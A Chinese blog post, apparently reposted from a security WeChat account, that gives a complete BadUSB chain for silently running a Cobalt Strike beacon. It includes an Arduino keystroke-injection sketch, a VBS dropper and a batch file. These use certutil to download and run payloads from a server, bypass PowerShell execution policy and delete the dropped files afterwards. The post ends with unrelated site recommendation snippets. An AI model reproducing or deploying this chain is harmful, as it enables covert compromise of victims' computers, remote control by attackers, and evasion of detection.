powershell cs上线_BasUSB实现后台静默执行上线CobaltStrike

最新推荐文章于 2024-05-03 19:05:25 发布
最新推荐文章于 2024-05-03 19:05:25 发布
阅读量687 收藏 1
点赞数
文章标签: powershell cs上线
c5c04795f295da6647e68e1d22206225.png点击上方蓝字  关注我们吧 88d164bd76265da6afc4f899e530a3c9.png

#0x01 缘由

继上次K师傅的投稿:BadUSB简单免杀一秒上线CobaltStrike

大概执行步骤:WIN+R >> CMD打开POWERSHELL >> POWERSHELL远程执行CobaltStrike生成的PS1文件 >> 主机上线

文中关于CMD打开POWERSHELL这个步骤有了新思路,因为主机上线过后考虑到CMD窗口会一直停留在任务栏,于是和K师傅探讨,最终实现了以VBS文件形式远程下载并执行CobaltStrike生成的PS1文件,来达到后台静默执行的目的。

#0x02 执行效果

1574ec3018664c38fb06b4c9bed2594e.gif

#0x03 BadUSB制作

POWERSHELL.ino(arduino烧录文件)

#include void setup() {  // putpower shell your setup code here, to run once  Keyboard.begin();//开始键盘通讯 delay(1000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(200);Keyboard.press('r');//r键delay(200); Keyboard.release(KEY_LEFT_GUI);Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法Keyboard.release(KEY_CAPS_LOCK);delay(300);Keyboard.println("cmd /q /c mode con:COLS=15 LINES=1 && certutil -urlcache -split -f http://0.0.0.0:8888/run.vbs d:\\run.vbs && timeout /t 1 && start /B d:\\run.vbs" );  //无回显//Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\"");   //有回显Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK);Keyboard.end();//结束键盘通讯 } void loop() {  // put your main code here, to run repeatedly: }

解释:

  1. WIN+R打开运行窗口,通过打开CMD下载RUN.VBS,落地到D盘根目录后CMD关闭,并静默执行RUN.VBS

27b179c0ce380052c5e445647a87f21f.png

#0x04 落地文件

RUN.VBS

set ws=WScript.CreateObject("WScript.Shell")ws.Run "cmd /c certutil -urlcache -split -f http://0.0.0.0:8888/POWERSHELL.BAT d:\\POWERSHELL.BAT && start /B d:\\POWERSHELL.BAT",0

解释:

  1. 通过certutil命令远程下载POWERSHELL.BAT,落地到D盘根目录

  2. 静默执行POWERSHELL.BAT

ecc43a3b5a3c82ecc0f578584469ef52.png

POWERSHELL.BAT

@echo offcertutil -urlcache -split -f http://0.0.0.0:8888/POWERSHELL.PS1 d:\\POWERSHELL.PS1TIMEOUT /T 1start /B powershell.exe -executionpolicy bypass -file d:\\POWERSHELL.PS1del D:\R*.VBS /f /s /qTIMEOUT /T 1del D:\P*.PS1 /f /s /qdel D:\P*.BAT /f /s /qexit

解释:

  1. 通过certutil命令下载POWERSHELL.PS1,落地到D盘根目录

  2. 考虑网络问题,下载POWERSHELL.PS1需要时间(测试的时候出现了执行速度太快,导致没下载完就直接执行了下一步),所以延时一秒

  3. 通过powershell后台静默执行POWERSHELL.PS1,至此CS上线

  4. 上线后立即删除R开头VBS文件

  5. 延时一秒(测试出现powershell执行速度太慢,没上线)

  6. 依次删除P开头PS1文件、P开头BAT文件

439f1cfb7603bf264be7db0bc7a95baa.png

e611c65634923b5bde840536c8c0c4ef.png

ea926281e883c3f459e04be7c1a44c0f.png 扫 码 关 注 最 新 分 享 搜 索 公 众 号 : n e a r s e c 2c78694d2447b365c6365c55efe0cb08.png你点的每个赞,我都认真当成了喜欢
weixin_39998521
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bat循环执行 一秒一次_Windows实现Python脚本的定时执行
weixin_39818264的博客
11-20 3815
在Linux操作系统下,可以通过crontab命令来实现任务的定时执行。那么在Windows系统下,如何实现这一功能呢?其实非常简单,只需要采用向注册表添加启动项,来执行批处理程序的思路。1、F:autodemo目录下创建一个python文件,命名为autorun.py,主要利用python自带的sched模块来创建一个定时任务。定时任务通过os.system()方法来执行命令。需要注意的是,多个...
bat循环执行 一秒一次_dos命令图文教程,cmd命令行窗口运行exe程序教学,bat批处理脚本...
weixin_39630855的博客
11-16 1511
大家好,我是老盖,首先感谢观看本文,本篇文章做的有视频,视频讲述的比较详细,也可以看我发布的视频。今天我们学习dos运行exe执行程序,运行exe的方式很简单,但是有一些需要注意的地方,分别和大家说一下。输入命令calc.exe回车,这个就是电脑上计算器的exe执行程序,输入计算器文件名字就启动了。没有输入路径是因为有个系统的环境变量。在启动运行exe的时候,如果只输入文件名,dos会从系统环境变...
2024年网络安全最全CS木马的几种上线方式总结_cs如何上线(1)
最新发布
2401_84281638的博客
05-03 785
CS上线方式还是有不少的,但是时间长不看容易忘记一部分,博客记录也比较分散导致找起来比较麻烦,因此写了这篇博客记录部分CS上线的相关知识点。
timertask run函数未执行_定时执行Abaqus作业任务
weixin_39610594的博客
12-10 224
Abaqus分析计划任务的批处理执行,基于windows的批处理文件的实现和基于python脚本的实现,大家应该都很熟悉了,通过事先编译好的脚本文件来批处理计划任务,简单示例如下:windows 批处理文件 (.bat)示例:abaqusjob=test1 cpus=4 intabaqus job=test2 cpus=4 intpython 批处理文件 (.py)示例:jobs=['...
bat循环执行 一秒一次_关于Kimsuky的一次恶意样本分析小记
weixin_39903846的博客
11-21 245
本文为看雪论坛优秀文章看雪论坛作者ID:不懂就不懂前言最近才开始关注朝鲜半岛相关的攻击行为,在看ESTS的相关文章,因为刚刚开始关注朝鲜半岛,拉撒路我就不考虑了。浏览的重点着重于Kimsuky相关PE样本。看到最近的一篇和PE有关的样本分析文章为https://blog.alyac.co.kr/3091。观看该文章总结的攻击链应该为“WSF恶意脚本文件->释放恶意DLL文件和与CO...
浏览器
weixin_34309435的博客
03-08 162
1. 跨标签页通讯不同标签页间的通讯,本质原理就是去运用一些可以 共享的中间介质,因此比较常用的有以下方法:1:设置同域下共享的localStorage与监听window.onstorage 重复写入相同的值无法触发 会受到浏览器隐身模式等的限制一、localStorage (1)localStorage是什么? localStorage对象在修订过的HTML5规范中作...
Cobalt_Strike_beacon免杀上线Powershell1
08-03
第一步,创建监听器,并用对应的监听器生成的 "Powershell payload " 第二步,回到本地机器上,先准备好一张大点的图片,比如随便去找一张"192
PowerShell_Setup_x86.rar
08-18
"PowerShell_Setup_x86.rar" 文件是一个针对32位(x86)操作系统的PowerShell安装包,通常用于升级或安装在旧版Windows系统上运行的PowerShell。此压缩包可能包含必要的组件和补丁,以便于用户在没有内置PowerShell...
cobaltstrike_script:钴击脚本
05-02
script"这一主题,深入探讨其核心组件——"chromedump_mimikatz.cna",以及与之相关的标签如"powershell", "aggregator", "sleep", "aggressor-scripts",并结合压缩包内的文件名"cobaltstrike_script-master"来解析...
PowerShell_LangRef_v4.pdf.zip_powershell
09-24
"PowerShell_LangRef_v4.pdf.zip_powershell" 提供了关于PowerShell的详细语言参考,特别是版本4的相关内容,这对于学习和理解PowerShell的核心概念、语法和常见用例非常有价值。 描述中的“PowerShell Examples ...
cobalt_strike_extension_kit:尝试成为其他人的有用的攻击者脚本以及我们在红队运营期间发现有用的事情的一个完整的仓库
05-02
cobalt_strike_extension_kit 想要为目前的许多技术提供一揽子服务吗? 克隆这个。 对于这项工作中的大部分,我都没有表示赞赏。 大部分工作受Outflank,Spectre Ops(0xThirteen)的影响,以及其他Aggressor脚本...
bat循环执行 一秒一次_用PDCA循环,提升执行不再拖延
weixin_39732866的博客
11-09 208
PDCA工作闭环管理,很多人都知道,也参加过一些相关培训,但是用的深入的并不多,很奇快PDCA工作法属于那种知易行难的东西,就是了解很容易,做起来很难,坚持很难。把事情分步骤,目标清晰地去完成,完不成的部分也要在第二阶段想办法去完成,不遗弃自己制定的目标,这样工作效率才能最大化!PDCA工作法(图片来源:tita.com)每一件事情先做计划,计划完了以后去实施,实施的过程中进行检查,检查结果以后,...
【动画演示】:事件循环 形象深动(JavaScript)
rizon886的博客
01-16 252
作者:Lydia Hallie译者:前端小智来源: dev 事件循环是什么,为什么要理解它? JS 是单线程的:一次只能运行一个任务。通常这没什么大不了的,但现在想象一下我们正在运行一个需要30秒的任务。在这个任务中,我们要等待30秒,然后才能执行接下来要做的事情(JS 默认运行在浏览器的主线程上,所以整个UI都卡住了)。 幸运的是,浏览器提供了 JS 引擎本身没有提供的一些特性:Web API。...
JavaScript 究竟是怎样执行的?
dichu2296的博客
06-24 85
摘要: 理解 JS 引擎运行原理。 作者:前端小智 原文:搞懂 JavaScript 引擎运行原理 Fundebug经授权转载,版权归原作者所有。 一些名词 JS 引擎 — 一个读取代码并运行的引擎,没有单一的“JS 引擎”;每个浏览器都有自己的引擎,如谷歌有 V。 作用域 — 可以从中访问变量的“区域”。 词法作用域— 在词法阶段的作用域,换句话说,词法作用域是由你在写代码时将变量...
USB后台静默拷贝工具
白雾林
04-03 239
软件运行时,当检测到有新的USB设备接入电脑,将会开始对设备中的文件进行拷贝,全程静默,不会被发现,可以最小化到托盘或彻底隐藏。 支持预设拷贝的文件扩展名,拷贝文件的存储位置等,具体下载后自行查看,只有100多KB。 注意,这只是我用来拷贝老师课件的工具,不要用于商业或违法等用途,转载请保留原下载链接(后期可能会对收集到的一些问题进行改进),否则无法下载最新版本。 点击这里下载,密码2580 ...
powershell cs上线_sqlserver注入到cs上线
weixin_39827905的博客
11-21 316
随手记录一下项目挖洞的情况,因为是私密项目,脱敏之后,权当是公众号水文章了,也是顺带记录一下自己挖洞的历程,希望一天比一天进步,发过的文章就是最好的见证成长的记录。狗头在上,打码为敬一看这个界面,就知道是老系统,肯定存在很多问题,随手一试,发现万能密码直接登录成功其他端口测试发现数据库为sqlserver,且是sa用户尝试开启xp扩展Poc:uname=admin';EXEC maste...
定时任务每隔1秒执行一次
m0_37693638的博客
12-03 3207
springboot 定时任务 package com.example.demo.until; import org.springframework.scheduling.annotation.EnableScheduling; import org.springframework.scheduling.annotation.Scheduled; import org.springframework.stereotype.Component; import javax.annotation.Resour
【运维心得】最简单的Bat实现间隔固定时间循环执行程序
知止不殆
01-18 5102
本代码非常简单,就是采用一个bat文件,循环执行一个exe文件,去掉了人工干预,可以在此代码基础上进行扩展。
内网渗透---后渗透工具Cobaltstrike入门使用
空の城的博客
08-01 3424
工具介绍与部署 Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。下文统称为cs,莫名让我想到了csgo,狗头 cobaltstrike最新汉化版 cs分为服务端和客户端,服务端运行与linux中,客户端则是都可以(Java的跨平台性) 服务端打开方式 ...
cobalt strike 后台运行
07-28
- *3* [powershell cs上线_BasUSB实现后台静默执行上线CobaltStrike](https://blog.csdn.net/weixin_39998521/article/details/110140157)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值